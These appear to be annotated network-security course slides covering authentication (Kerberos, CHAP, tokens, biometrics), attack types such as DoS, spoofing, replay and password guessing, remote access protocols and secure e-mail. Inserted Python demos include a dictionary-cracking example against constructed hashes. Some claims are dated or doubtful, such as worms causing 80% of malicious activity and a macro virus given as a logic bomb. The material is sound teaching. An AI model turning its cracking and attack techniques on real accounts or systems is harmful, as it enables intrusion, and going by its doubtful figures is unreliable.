Chapter 1
Learning Objectives
Understand network security
Understand security threat trends and their ramifications
Understand the goals of network security
Determine the factors involved in a secure network strategy
Network security: the process by which digital information assets are protected
Goals
o Maintain integrity
o Protect confidentiality
o Assure availability
Security Threats
Identity theft
Privacy concerns
Wireless access
Goals of Network Security
Integrity
o Assurance that data is not altered or destroyed in an unauthorized manner
Confidentiality
o Protection of data from unauthorized disclosure to a third party
Availability
o Continuous operation of computing systems
Technology Weaknesses
TCP/IP
Operating systems
Network equipment
Configuration Weaknesses
Unsecured accounts
System accounts with easily guessed passwords
Misconfigured Internet services
Unsecured default settings
Misconfigured network equipment
Policy Weaknesses
Lack of a written security policy
Politics
High turnover
Concise access controls not applied
Software and hardware installation and changes do not follow policy
Proper security
Nonexistent disaster recovery plan
Human Error
Accident
Ignorance
Workload
Dishonesty
Security Threats (continued)
Trojan horse programs
Vandals
Viruses
Impersonation
Disgruntled employees
Snoops
Denial-of-service attacks
Secure Network Strategy
Firewalls
o Prevent unauthorized access to or from a private network
o Create a protective layer between the network and the outside world
o Replicate the network at the point of entry in order to receive and transmit authorized data
o Have built-in filters
o Log attempted intrusions and create reports
o Ensure that only legitimate traffic is allowed into or out of the network
Authentication
o Passwords
o PINs
o Smartcards
Document changes to all areas of the IT infrastructure
Encryption
o Ensures messages cannot be intercepted or read by anyone other than the intended person(s)
Intrusion Detection
o Provides 24/7 network surveillance
o Analyzes packet data streams within the network
o Searches for unauthorized activity
Chapter Summary
Understanding network security
Security threats
Security ramifications
Goals of network security
Creating a secure network strategy
Authentication
Chapter 2
Learning Objectives
Create strong passwords and store them securely
Understand the Kerberos authentication process
Understand how CHAP works
Understand what mutual authentication is and why it is necessary
Understand how digital certificates are created and why they are used
Understand what tokens are and how they function
Understand biometric authentication processes and their strengths and weaknesses
Understand the benefits of multifactor authentication
Authentication
Positive identification of person/system seeking access to secured information/services
Authorization
Predetermined level of access to resources
Accounting
Logging use of each asset
Authentication Techniques
Usernames and passwords
Kerberos
Challenge Handshake Authentication Protocol (CHAP)
Mutual authentication
Digital certificates
Tokens
Biometrics
Multifactor authentication
Username
o Unique alphanumeric identifier used to identify an individual when logging onto a computer/network
Password
o Secret combination of keystrokes that, when combined with a username, authenticates a user to a computer/network
Creating Strong Passwords
o Take the first letter of each word of a simple phrase, then add a number and punctuation
o Example: Asb4M? (six characters is short by current standards; the same technique applied to a longer phrase gives a longer password)
o Use a different password for each group of accounts
o Cycle more complex passwords down the groups, from most sensitive to least
o Caveat: a password demoted from a sensitive account to a less sensitive one is still a reused password; if it was ever exposed, it is exposed everywhere it is reused
Storing Passwords
Written
o Keep the list in a place you are not likely to lose it
o Use small type
o Develop a personal code to apply to the list
Electronic
o Use a specifically designed application (a password manager that encrypts the data)
Kerberos
Provides a secure and convenient way to access data and services through:
o Session keys
o Tickets
o Authenticators
o Authentication servers
o Ticket-granting tickets
o Ticket-granting servers
o Cross-realm authentication
Session key
o Secret key used during a logon session between a client and a service
Ticket
o Set of electronic information used to authenticate the identity of a principal to a service
Authenticator
o Record containing the client's name and a timestamp, encrypted under the session key; it proves to the service that whoever presents the ticket also holds the session key, and that the request is fresh rather than replayed
Authentication server
o Server that issues a ticket-granting ticket to a principal after verifying its identity
Ticket-granting ticket
o Data structure that acts as an authenticating proxy for the principal's master key for a set period of time
Ticket-granting server
o Server that issues service tickets to a principal that presents a valid ticket-granting ticket
Cross-Realm Authentication
o Allows a principal to authenticate itself to gain access to services in a distant part of a Kerberos system
CHAP Authenticator (not a Kerberos term)
o In CHAP the word means the device (e.g., a PPP network server) that requires authentication from a peer and specifies the authentication protocol used in the configure request during the link-establishment phase
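The exchange above (AS, then TGS, then the service) as a runnable simulation. This is an added example, not code from the original slides or from any Kerberos implementation: the "encryption" is a toy authenticated-encryption stand-in built from HMAC-SHA256 (real Kerberos uses AES), the string-to-key function is a bare SHA-256, and the principal names, passwords, key lengths and ticket lifetime are assumptions made for the example.

```python
"""Toy Kerberos exchange: AS -> TGS -> application server, all in one process.

Added illustration, not real Kerberos code. seal()/unseal() stand in for the
AES-based encryption of real Kerberos; names, passwords and lifetimes are made up.
"""
import hashlib
import hmac
import json
import secrets
import time

CLOCK_SKEW = 300  # seconds; Kerberos' usual tolerance for authenticator timestamps


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    out, ctr = b"", 0
    while len(out) < n:
        out += hmac.new(key, nonce + ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        ctr += 1
    return out[:n]


def seal(key: bytes, obj: dict) -> bytes:
    """Toy authenticated encryption of a JSON object under `key` (nonce || ct || tag)."""
    pt = json.dumps(obj, sort_keys=True).encode()
    nonce = secrets.token_bytes(16)
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def unseal(key: bytes, blob: bytes) -> dict:
    """Inverse of seal(); raises ValueError on a wrong key or a tampered blob."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("wrong key or tampered ticket")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))


def password_key(password: str) -> bytes:
    # Real Kerberos derives the long-term key with a salted string-to-key function;
    # a bare SHA-256 keeps the example short.
    return hashlib.sha256(password.encode()).digest()


class KDC:
    """Authentication server (AS) and ticket-granting server (TGS) in one object."""

    def __init__(self, principals: dict, lifetime: int = 3600):
        self.keys = {name: password_key(pw) for name, pw in principals.items()}
        self.tgs_key = secrets.token_bytes(32)   # only the TGS can open a TGT
        self.lifetime = lifetime

    def as_exchange(self, client: str) -> bytes:
        """AS-REP: a TGT plus a session key, sealed under the client's long-term key."""
        sk = secrets.token_bytes(32)
        tgt = seal(self.tgs_key, {"client": client, "key": sk.hex(),
                                  "exp": time.time() + self.lifetime})
        return seal(self.keys[client], {"key": sk.hex(), "tgt": tgt.hex()})

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, service: str) -> bytes:
        """TGS-REP: check the TGT and the authenticator, then issue a service ticket."""
        t = unseal(self.tgs_key, tgt)
        sk = bytes.fromhex(t["key"])
        auth = unseal(sk, authenticator)          # proves the caller holds the session key
        now = time.time()
        if t["exp"] < now or auth["client"] != t["client"] or abs(now - auth["ts"]) > CLOCK_SKEW:
            raise ValueError("expired TGT or bad authenticator")
        svc_key = secrets.token_bytes(32)
        ticket = seal(self.keys[service], {"client": t["client"], "key": svc_key.hex(),
                                           "exp": now + self.lifetime})
        return seal(sk, {"key": svc_key.hex(), "ticket": ticket.hex()})


def client_login(kdc: KDC, name: str, password: str, service: str):
    """Client side: TGT, then service ticket, then the AP-REQ (ticket + authenticator)."""
    key = password_key(password)
    rep = unseal(key, kdc.as_exchange(name))   # a wrong password fails right here
    sk, tgt = bytes.fromhex(rep["key"]), bytes.fromhex(rep["tgt"])
    rep2 = unseal(sk, kdc.tgs_exchange(tgt, seal(sk, {"client": name, "ts": time.time()}), service))
    svc_key, ticket = bytes.fromhex(rep2["key"]), bytes.fromhex(rep2["ticket"])
    return ticket, seal(svc_key, {"client": name, "ts": time.time()})


def service_accept(service_key: bytes, ticket: bytes, authenticator: bytes) -> bool:
    """Application server: needs only its own long-term key and never contacts the KDC."""
    t = unseal(service_key, ticket)
    auth = unseal(bytes.fromhex(t["key"]), authenticator)
    now = time.time()
    return auth["client"] == t["client"] and t["exp"] > now and abs(now - auth["ts"]) <= CLOCK_SKEW


if __name__ == "__main__":
    kdc = KDC({"alice": "correct horse battery", "host/fileserver": "service-secret"})
    ticket, auth = client_login(kdc, "alice", "correct horse battery", "host/fileserver")
    print("service accepted alice:", service_accept(password_key("service-secret"), ticket, auth))
```

Two things the simulation makes visible that the bullet list does not: the user's password never leaves the client (it is only used to open the AS reply), and the application server verifies the ticket with its own key without ever talking to the KDC. A real deployment also keeps a replay cache of recent authenticators, which this toy omits.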
Mutual Authentication
Process by which each party in an electronic communication verifies the identity of the other party
Digital Certificates
Electronic means of verifying the identity of an individual/organization
Digital signature
o Piece of data that claims that a specific, named individual wrote or agreed to the contents of an electronic document to which the signature is attached
Encryption
o Converts a plain text message into a secret message
Decryption
o Converts a secret message back into a plain text message
Symmetric (secret-key) encryption
o Uses only one key, shared by sender and receiver
Asymmetric (public-key) encryption
o Uses a key pair (private key and public key)
Certificate authority (CA)
o Trusted third-party entity that verifies the actual identity of an organization/individual before providing a digital certificate
Nonrepudiation
o Practice of using a trusted third-party entity to verify the authenticity of the party who sent a message
o More precisely: the sender cannot later deny having sent the message, because the digital signature could only have been produced with the sender's private key, and the CA vouches for who holds that key
Security Tokens
Authentication devices assigned to a specific user
Small, credit card-sized physical devices
Incorporate two-factor authentication methods
Utilize base keys that are much stronger than the short, simple passwords a person can remember
Passive
o Act as a storage device for the base key
o Do not emit, or otherwise share, the base key
Active
o Actively create another form of the base key, or an encrypted form of the base key, that is not subject to attack by sniffing and replay
o Can provide variable outputs in various circumstances
One-Time Passwords
Used only once for a limited period of time; then no longer valid
Use shared keys and challenge-and-response systems, which do not require that the secret be transmitted or revealed
Strategies for generating one-time passwords
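A concrete one-time-password scheme of the kind an active token produces, as an added example (not code from the slides): HOTP from RFC 4226 (counter-based) and TOTP from RFC 6238 (time-based), with the server-side check that makes a captured code useless a second time. The shared secret is the RFC test-vector secret, not a real key; the look-ahead window of 3 and the one-step clock tolerance are this example's own choices.

```python
"""HOTP (RFC 4226) and TOTP (RFC 6238) one-time passwords, with server-side verifiers.

Added illustration, not code from the original slides. SECRET is the RFC 4226 test-vector
secret; the look-ahead window and clock tolerance are this example's own assumptions.
"""
import hashlib
import hmac
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-SHA1 over the 8-byte big-endian counter, then RFC 4226 'dynamic truncation'."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)


def totp(secret: bytes, for_time=None, step: int = 30, digits: int = 6) -> str:
    """TOTP is HOTP with counter = floor(unix_time / step); both sides need a sane clock."""
    t = int(time.time() if for_time is None else for_time)
    return hotp(secret, t // step, digits)


class HotpVerifier:
    """Server side of HOTP: shared secret, a small look-ahead window for lost button
    presses, and a strictly increasing counter so a captured code cannot be replayed."""

    def __init__(self, secret: bytes, window: int = 3):
        self.secret = secret
        self.window = window
        self.last_counter = -1

    def verify(self, code: str) -> bool:
        for c in range(self.last_counter + 1, self.last_counter + 1 + self.window):
            if hmac.compare_digest(hotp(self.secret, c), code):
                self.last_counter = c          # everything at or below c is now burned
                return True
        return False


class TotpVerifier:
    """Accepts the current step and one step either side; never accepts a step twice."""

    def __init__(self, secret: bytes, step: int = 30):
        self.secret, self.step, self.last_step = secret, step, -1

    def verify(self, code: str, for_time=None) -> bool:
        now = int(time.time() if for_time is None else for_time) // self.step
        for s in (now - 1, now, now + 1):
            if s > self.last_step and hmac.compare_digest(hotp(self.secret, s), code):
                self.last_step = s
                return True
        return False


SECRET = b"12345678901234567890"   # RFC 4226 / RFC 6238 test-vector secret, not a real key
```

The point of `last_counter` and `last_step` is the replay defence the slide alludes to: the secret never crosses the wire, and a code that was sniffed and resubmitted is rejected because its counter is no longer ahead of the server's.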
Biometrics
Biometric authentication
o Uses measurements of physical or behavioral characteristics of an individual
o Generally considered the most accurate of all authentication methods; in practice accuracy is a tunable trade-off, since tightening the match threshold lowers false positives but raises false negatives
o Traditionally used in highly secure areas
o Expensive
False positive
o Occurrence of an unauthorized person being authenticated by a biometric authentication process
False negative
o Occurrence of an authorized person not being authenticated by a biometric authentication process when they are who they claim to be
Physical characteristics
o Fingerprints
o Hand geometry
o Retinal scanning
o Iris scanning
o Facial scanning
Behavioral characteristics
o Handwritten signatures
o Voice
Fingerprint Biometrics
Retinal Scanning
Iris Scanning
Signature Verification
Multifactor Authentication
Identity of an individual is verified using at least two of the three factors of authentication
o Something you know (e.g., password)
o Something you have (e.g., smart card)
o Something about you (e.g., biometrics)
Chapter Summary
Authentication techniques
o Usernames and passwords
o Kerberos
o CHAP
o Mutual authentication
o Digital certificates
o Tokens
o Biometrics
o Multifactor authentication
Learning Objectives
Explain denial-of-service (DoS) attacks
Explain and discuss ping-of-death attacks
Identify the major components used in a DDoS attack and how they are installed
Understand the major types of spoofing attacks
Discuss man-in-the-middle attacks, replay attacks, and TCP session hijacking
Detail three types of social-engineering attacks and explain why they can be incredibly damaging
List the major types of attacks used against encrypted data
List the major types of malicious software and identify a countermeasure for each one
Denial-of-Service Attacks
Any malicious act that causes a system to be unusable by its real user(s)
Take numerous forms
Are very common
Can be very costly
Major types:
SYN Flood
Exploits the TCP three-way handshake
Inhibits the server's ability to accept new TCP connections
Smurf
Non-OS-specific attack that uses the network to amplify its effect on the victim
Floods a host with ICMP
Saturates the Internet connection with bogus traffic and delays/prevents legitimate traffic from reaching its destination
Ping of Death
Sends a fragmented ICMP echo request whose reassembled size exceeds the 65,535-byte IP maximum, crashing older IP stacks
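What a SYN flood looks like from the defender's side, as an added example (not code from the slides): a detector that replays a constructed packet trace and counts half-open connections, that is, SYNs the server answered but the client never completed. The trace, the addresses, the 10-second window and the threshold of 50 are assumptions made for the example.

```python
"""Spotting a SYN flood from packet summaries by counting half-open connections.

Added illustration, not code from the original slides. build_trace() produces a
constructed trace of (time, src, dst, flags); addresses, window and threshold are made up.
"""
from collections import defaultdict


def half_open_connections(packets, window: float = 10.0) -> dict:
    """Return {dst_ip: number of SYNs in the last `window` seconds never completed by an ACK}.

    A real tracker keys on (src, sport, dst, dport) and checks the SYN-ACK too;
    keying on (src, dst) is enough to show the idea.
    """
    pending = {}
    for ts, src, dst, flags in packets:
        if flags == "S":
            pending[(src, dst)] = ts                 # step 1 of the handshake
        elif flags == "A" and (src, dst) in pending:
            del pending[(src, dst)]                  # step 3: the client answered
    now = max(ts for ts, *_ in packets)
    counts = defaultdict(int)
    for (src, dst), ts in pending.items():
        if now - ts <= window:
            counts[dst] += 1
    return dict(counts)


def syn_flood_suspects(packets, threshold: int = 50, window: float = 10.0) -> list:
    """Destinations with at least `threshold` half-open connections in the window."""
    return sorted(d for d, n in half_open_connections(packets, window).items() if n >= threshold)


def build_trace() -> list:
    """Constructed sample: 20 clients complete handshakes with two servers, then 200 SYNs
    from spoofed sources hit 10.0.0.5 and the third handshake step never arrives."""
    packets, t = [], 0.0
    for i in range(20):
        client = f"198.51.100.{i + 1}"
        for server in ("10.0.0.5", "10.0.0.6"):
            packets.append((t, client, server, "S"))
            packets.append((t + 0.01, server, client, "SA"))
            packets.append((t + 0.02, client, server, "A"))
        t += 0.1
    for i in range(200):
        src = f"203.0.113.{i + 1}"                   # spoofed: nobody will ever ACK
        packets.append((t, src, "10.0.0.5", "S"))
        packets.append((t + 0.01, "10.0.0.5", src, "SA"))
        t += 0.01
    return packets
```

The defender's fix on the host side is SYN cookies, which let the server answer SYNs without keeping state until the third packet arrives; this detector is for spotting the flood in the first place, for instance from a span port.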
DDoS Countermeasures
Security patches from software vendors
Antivirus software
Firewalls
Ingress (inbound) and egress (outbound) filtering
Spoofing
Act of falsely identifying a packet's IP address, MAC address, etc.
Four primary types:
o IP address spoofing
o ARP poisoning
o Web spoofing
o DNS spoofing
IP Address Spoofing
Used to exploit trust relationships between two hosts
Involves creating an IP packet with a forged source address
ARP Poisoning
Used in man-in-the-middle and session hijacking attacks; the attacker takes over the victim's IP address by corrupting the ARP caches of directly connected machines
Attack tools
Web Spoofing
Convinces the victim that he or she is visiting a real and legitimate site
Considered both a man-in-the-middle attack and a denial-of-service attack
DNS Spoofing
Aggressor poses as the victim's legitimate DNS server
Can direct users to a compromised server
Can redirect corporate e-mail through a hacker's server where it can be copied or modified before the mail is sent on to its final destination
Spoofing Countermeasures
IP address spoofing
o Disable source routing on all internal routers
o Filter out packets entering the local network from the Internet that have a source address of the local network
ARP poisoning
o Use network switches that have MAC binding features
Web spoofing
o Educate users
DNS spoofing
o Thoroughly secure DNS servers
o Deploy anti-IP address spoofing measures
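The ingress/egress filter from the IP spoofing countermeasures above, written out as an added example (not code from the slides): a pure function that decides, for a packet on the Internet-facing interface, whether its source address is plausible for the direction it is travelling. The internal prefixes, the bogon list and the sample packets are constructed for the example.

```python
"""Anti-spoofing (ingress/egress) filter for a border router, as a pure function.

Added illustration, not code from the original slides. The internal prefixes,
bogon list and packet samples are constructed.
"""
import ipaddress

INTERNAL = [ipaddress.ip_network(p) for p in ("192.168.0.0/16", "10.0.0.0/8")]
# Sources that must never arrive from the Internet, whatever our own ranges are.
BOGONS = [ipaddress.ip_network(p) for p in ("127.0.0.0/8", "0.0.0.0/8", "169.254.0.0/16")]


def in_any(ip: str, nets) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in n for n in nets)


def border_filter(direction: str, src: str, dst: str) -> str:
    """Decide 'permit' or 'deny' for a packet on the Internet-facing interface.

    direction is 'in' (arriving from the Internet) or 'out' (leaving towards it).
    """
    if direction == "in":
        if in_any(src, INTERNAL):
            return "deny"      # ingress: an outside packet claiming an inside source is spoofed
        if in_any(src, BOGONS):
            return "deny"
        return "permit"
    if direction == "out":
        if not in_any(src, INTERNAL):
            return "deny"      # egress: our hosts may not emit packets with foreign sources
        return "permit"
    raise ValueError("direction must be 'in' or 'out'")


def apply_filter(packets) -> list:
    """Run a list of (direction, src, dst) tuples and keep only the permitted ones."""
    return [p for p in packets if border_filter(*p) == "permit"]
```

The egress rule is the one sites most often skip: it does nothing for your own network, but it stops your hosts being used as the spoofed source in someone else's SYN flood or Smurf attack. Disabling source routing is a separate router setting and is not expressed by this filter.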
Man-in-the-Middle Attacks
Man-in-the-Middle Applications
Web spoofing
TCP session hijacking
Information theft
Other attacks (denial-of-service attacks, corruption of transmitted data, traffic analysis to gain information about the victim's network)
Man-in-the-Middle Methods
ARP poisoning
ICMP redirects
DNS poisoning
Replay Attacks
Attempts to circumvent authentication mechanisms by:
o Recording authentication messages from a legitimate user
o Reissuing those messages in order to impersonate the user and gain access to systems
Countermeasure: make every authentication exchange fresh (a server-chosen random challenge, a timestamp or a sequence number), so that a recorded message is rejected when it is presented again
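CHAP is the simplest protocol on this chapter's list that resists replay, so it serves as the worked example for both the CHAP learning objective and the replay attack above. This is an added example, not code from the slides or from any PPP implementation: the response computation follows RFC 1994, while the peer name, the secret and the deliberately broken "static challenge" mode (added only to show what a fresh challenge prevents) are constructed.

```python
"""CHAP (RFC 1994) challenge-response, and why a recorded response cannot be replayed.

Added illustration, not code from the original slides. The peer name and secret are
constructed; fresh_challenges=False is a deliberately broken variant added to show the
failure that a fresh challenge and identifier prevent.
"""
import hashlib
import hmac
import os


def chap_response(ident: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 response: MD5(Identifier || secret || Challenge). MD5 is what the RFC
    specifies; note the secret must be stored in clear on both ends, a known CHAP drawback."""
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()


class ChapAuthenticator:
    """The PPP authenticator side: issues challenges and checks responses."""

    def __init__(self, secrets: dict, fresh_challenges: bool = True):
        self.secrets = secrets
        self.fresh = fresh_challenges
        self.outstanding = {}          # ident -> challenge still awaiting a response
        self.ident = 0
        self.fixed = b"\x00" * 16      # used only by the broken static-challenge mode

    def challenge(self):
        if self.fresh:
            self.ident = (self.ident + 1) % 256
            ch = os.urandom(16)
        else:
            ch = self.fixed            # broken: same identifier, same challenge every time
        self.outstanding[self.ident] = ch
        return self.ident, ch

    def verify(self, ident: int, name: str, response: bytes) -> bool:
        ch = self.outstanding.pop(ident, None)   # a challenge may be answered once, pass or fail
        if ch is None or name not in self.secrets:
            return False
        return hmac.compare_digest(response, chap_response(ident, self.secrets[name], ch))


def peer_answer(ident: int, challenge: bytes, name: str, secret: bytes):
    """What the peer sends back: (ident, name, response)."""
    return ident, name, chap_response(ident, secret, challenge)


def replay_succeeds(authenticator: ChapAuthenticator, name: str, secret: bytes) -> bool:
    """An attacker records one legitimate exchange and resubmits the response verbatim
    against the authenticator's next challenge. True means the replay got in."""
    ident, ch = authenticator.challenge()
    recorded = peer_answer(ident, ch, name, secret)
    assert authenticator.verify(*recorded)          # the genuine peer logs in
    ident2, _ = authenticator.challenge()           # attacker connects; a new challenge is issued
    return authenticator.verify(ident2, recorded[1], recorded[2])
```

With a fresh identifier and random challenge each time, the recorded digest never matches again; with the broken static mode it matches every time, which is exactly the replay attack described above.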
TCP Session Hijacking
Hunt (Linux): a tool that performs TCP session hijacking on a shared network segment
Social Engineering
Class of attacks that uses trickery on people instead of computers
Goals
o Fraud
o Network intrusion
o Industrial espionage
o Identity theft
o Desire to disrupt the system or network
Dumpster Diving
Online Attacks
Use chat and e-mail venues to exploit trust relationships
Weak Keys
Secret keys used in encryption that exhibit regularities in encryption, or even a poor level of encryption
Mathematical Attack
Attempts to decrypt encrypted data using mathematics to find weaknesses in the encryption algorithm
Categories of cryptanalysis
Birthday Attack
Class of brute-force mathematical attacks that exploits the birthday paradox against hash algorithms and one-way hash functions: two inputs with the same n-bit digest can be found with roughly 2^(n/2) hash computations, far fewer than the 2^n needed to invert a specific digest
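The 2^(n/2) figure, demonstrated on a digest short enough to collide instantly. This is an added example, not code from the slides: the "weak hash" is SHA-256 truncated to a chosen number of bits, and the message prefix is made up.

```python
"""Birthday attack on a truncated hash: collisions in an n-bit digest cost about 2^(n/2) work.

Added illustration, not code from the original slides. The 'hash' is SHA-256 cut down to
`bits` bits so the search finishes instantly; the message prefix is constructed.
"""
import hashlib
import itertools
import math


def trunc_hash(msg: bytes, bits: int) -> int:
    """First `bits` bits of SHA-256, as an integer: a stand-in for a weak, short digest."""
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") >> (256 - bits)


def expected_attempts(bits: int) -> float:
    """Mean number of distinct inputs hashed before the first collision: sqrt(pi * 2^bits / 2)."""
    return math.sqrt(math.pi * 2 ** bits / 2)


def find_collision(bits: int, prefix: bytes = b"doc-"):
    """Hash distinct messages until two share a digest; return (m1, m2, attempts).

    Memory grows with the attempts, which is why real attacks use cycle-finding
    (Pollard rho) instead of a dictionary; the work estimate is the same.
    """
    seen = {}
    for i in itertools.count():
        m = prefix + str(i).encode()
        h = trunc_hash(m, bits)
        if h in seen:
            return seen[h], m, i + 1
        seen[h] = m
```

For a 24-bit digest the search ends after roughly five thousand hashes; the same formula gives about 2^80 for a 160-bit digest such as SHA-1 and 2^128 for SHA-256, which is why a hash's collision resistance is counted as half its output length.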
Password Guessing
Tricks authentication mechanisms by determining a users password using techniques such as brute force or dictionary attacks
Brute Force
Method of breaking passwords that involves computation of every possible combination of characters for a password of a given character length
Dictionary
Method of breaking passwords by using a predetermined list of words as input to the password hash
Only works against poorly chosen passwords
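Brute-force and dictionary guessing both run the candidate through the same hash the system used, so how the system stores the hash decides how much each guess costs. The following added example (not code from the slides) cracks a constructed set of accounts two ways: against unsalted MD5, where one precomputed table serves every account, and against salted PBKDF2, where every account costs a fresh pass over the list and every guess costs thousands of HMACs. The word list, account names and passwords are made up, and the PBKDF2 round count is kept low so the example runs quickly.

```python
"""Dictionary attack against stored password hashes, and why salting and stretching help.

Added illustration, not code from the original slides. The word list, accounts and
passwords are constructed; 'weak' storage is an unsalted MD5 hex digest and 'strong'
storage is salted PBKDF2-HMAC-SHA256 (rounds kept low so the example runs quickly).
"""
import hashlib
import os

WORDLIST = ["password", "letmein", "qwerty", "Summer2003", "dragon", "baseball"]  # constructed


def weak_store(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()          # no salt, one fast hash


def strong_store(password: str, salt: bytes = None, rounds: int = 10_000) -> tuple:
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds).hex()


def crack_weak(stored: dict) -> tuple:
    """One precomputed table serves every account. Returns (cracked, hashes computed)."""
    table = {weak_store(w): w for w in WORDLIST}
    found = {user: table[h] for user, h in stored.items() if h in table}
    return found, len(WORDLIST)


def crack_strong(stored: dict, rounds: int = 10_000) -> tuple:
    """The salt forces a fresh run of the word list per account and each guess costs
    `rounds` HMACs. Returns (cracked, HMACs computed): up to accounts * words * rounds."""
    found, work = {}, 0
    for user, (salt, digest) in stored.items():
        for w in WORDLIST:
            work += rounds
            if strong_store(w, salt, rounds)[1] == digest:
                found[user] = w
                break
    return found, work
```

Neither scheme protects "letmein": a dictionary word falls either way. What the salt and the round count change is the cost per guess and the impossibility of amortising that cost across accounts, which is what turns a weak password's exposure from instant into expensive.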
Software Exploitation
Utilizes software vulnerabilities to gain access and compromise systems
Example
o Buffer overflow attack
Countermeasure
o Stay apprised of the latest security patches provided by software vendors
Malicious Software
Viruses
Self-replicating programs that spread by infecting other programs
Damaging and costly
Virus Databases
Virus Countermeasures
Desktop antivirus programs
Virus filters for e-mail servers
Network appliances that detect and remove viruses
Backdoor
Remote access program surreptitiously installed on user computers that allows an attacker to control the behavior of the victim's computer
Also known as remote access Trojans
Examples
o Back Orifice 2000 (BO2K)
o NetBus
Countermeasures
o Up-to-date antivirus software
o Intrusion detection systems (IDS)
Trojan Horses
Class of malware that uses social engineering to spread
Types of methods
o Sending copies of itself to all recipients in the user's address book
o Deleting or modifying files
o Installing backdoor/remote control programs
Logic Bombs
Set of computer instructions that lie dormant until triggered by a specific event
Once triggered, the logic bomb performs a malicious task
Almost impossible to detect until after it is triggered
Often the work of former employees
For example: macro virus
Worms
Self-contained program that uses security flaws such as buffer overflows to remotely compromise a victim and replicate itself to that system
Do not infect other executable programs
Account for 80% of all malicious activity on the Internet
Examples: Code Red, Code Red II, Nimda
Chapter Summary
Mechanisms, countermeasures, and best practices for:
o Malicious software
o Denial-of-service attacks
o Software exploits
o Social engineering
o Attacks on encrypted data
Remote Access
Chapter 4
Learning Objectives
Understand the implications of IEEE 802.1x and how it is used
Understand VPN technology and its uses for securing remote access to networks
Understand how RADIUS authentication works
Understand how TACACS+ operates
Understand how PPTP works and when it is used
Understand how L2TP works and when it is used
Understand how SSH operates and when it is used
Understand how IPSec works and when it is used
Understand the vulnerabilities associated with telecommuting
IEEE 802.1x
IEEE standard for port-based network access control: a switch or access-point port passes only authentication traffic until the attached device (the supplicant) has authenticated
Does not use SNMP; the authenticator (the switch or access point) carries EAP frames from the supplicant using the EAP over LAN (EAPOL) encapsulation and normally relays them to a RADIUS server, which performs the actual credential check
Used both for wired LAN port security and for wireless LAN authentication
Telnet
Standard terminal emulation protocol within the TCP/IP protocol suite, defined by RFC 854
Uses TCP port 23 (not UDP) to communicate
Allows users to log on to remote networks and use resources as if locally connected
Sends usernames, passwords and the whole session in cleartext, so anyone who can sniff the path can read them; SSH (later in this chapter) is the usual replacement
Controlling Telnet
Assign an enable password as the initial line of defense
Use access lists that define who has access to what resources based on specific IP addresses
Use a firewall that can filter traffic based on ports, IP addresses, etc.
VPN Diagram
Tunneling
Enables one network to send its data via another network's connections
Encapsulates a network protocol within packets carried by the second network
VPN Options
Install/configure the client computer to initiate the necessary security communications
Outsource the VPN to a service provider
VPN Drawbacks
Not completely fault tolerant
Diverse implementation choices
o Software solutions tend to have trouble processing all the simultaneous connections on a large network
o Hardware solutions require higher costs
RADIUS
Authenticates users through a series of communications between client and server using UDP
PPTP Tasks
Queries the status of communications servers
Provides in-band management
Allocates channels and places outgoing calls
Notifies Windows NT Server of incoming calls
Transmits and receives user data with bidirectional flow control
Notifies Windows NT Server of disconnected calls
Assures data integrity; coordinates packet flow
L2TP
Solves splitting problems by projecting a PPP session to a location other than the point at which it is physically received
SSH
Lets a user:
o Log on to another computer over a network
o Execute commands on a remote machine
o Move files from one machine to another
IP Security Protocol
Set of protocols developed by the IETF to support secure exchange of packets at the IP layer
Deployed widely to implement VPNs
Works with existing and future IP standards
Transparent to users
Promises painless scalability
Handles encryption at the packet level using Encapsulating Security Payload (ESP)
Telecommuting Vulnerabilities
Remote Solutions
Microsoft Terminal Server
Citrix Metaframe
Virtual Network Computing
Chapter Summary
Paramount need for remote access security
Use of technologies to mitigate some of the risk of compromising the information security of a home network
Importance of keeping pace with technology changes
E-mail
Chapter 5
Learning Objectives
Understand the need for secure e-mail
Outline the benefits of PGP and S/MIME
Understand e-mail vulnerabilities and how to safeguard against them
Explain the dangers posed by e-mail hoaxes and spam, as well as actions that can be taken to counteract them
Secure E-mail
Uses cryptography to secure messages transmitted across insecure networks
E-mail can be transmitted over unsecured links
E-mail can be stored in encrypted form
Building blocks: encryption, digital signatures, digital certificates
Encryption
Passes data and a value (key) through a series of mathematical formulas that make the data unusable and unreadable
To recover the information, reverse the process using the appropriate key
Two main types
o Conventional (secret-key) encryption: one shared key; fast, but results in a key-distribution problem
o Public-key encryption: a key pair (private key and public key)
Hash Functions
Produce a message digest that cannot be reversed to produce the original
Two major hash functions in use
Digital Signatures
Electronic identification of a person or thing created by using a public key algorithm
Verify (to a recipient) the integrity of the data and the identity of the sender
Provide the same features as encryption, except confidentiality
Created by using hash functions
Digital Certificates
Electronic document attached to a public key by a trusted third party
Provide proof that the public key belongs to a legitimate owner and has not been compromised
Consist of:
Background on PGP
Current de facto standard
Written by Phil Zimmermann in 1991
Supports major conventional encryption methods
o CAST
o International Data Encryption Algorithm (IDEA)
o Triple Data Encryption Standard (3DES)
o Twofish
PGP Certificates
More flexible and extensible than X.509 certificates
A single certificate can contain multiple signatures
S/MIME
Specification designed to add security to e-mail messages in MIME format
Security services
Technologies used
o RSA
o RC2
o SHA-1
o ANSI X.509 certificates
o Transport over the Internet
S/MIME Background
Four primary standards
o RFC 2630: Cryptographic Message Syntax
o RFC 2633: S/MIME version 3 Message Specification
o RFC 2632: S/MIME version 3 Certificate Handling
